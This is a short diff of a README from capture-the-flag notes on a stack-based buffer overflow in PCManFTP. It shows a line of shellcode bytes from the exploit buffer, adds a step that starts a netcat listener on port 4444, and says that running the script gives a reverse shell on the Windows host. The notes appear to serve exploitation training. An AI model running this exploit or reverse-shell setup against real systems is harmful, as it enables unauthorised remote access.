Rob-VanDusen/ctf-notes/Stack-Based-BOF/PCManFTP/README.md

 buf += b"\x88\x69\x1d\x44\xa8\xbb"
 ```

+Once we are all set, we need a terminal window opened an netcat running:

+`nc -lvp 4444'

-Once we are all set, we can run the script and if all went correctly, we should now have a reverse shell to the Windows machine, running as the same account that is running the PCManFTP software.
+Then, in another terminal window, we can run the script and if all went correctly, we should now have a reverse shell to the Windows machine, running as the same account that is running the PCManFTP software.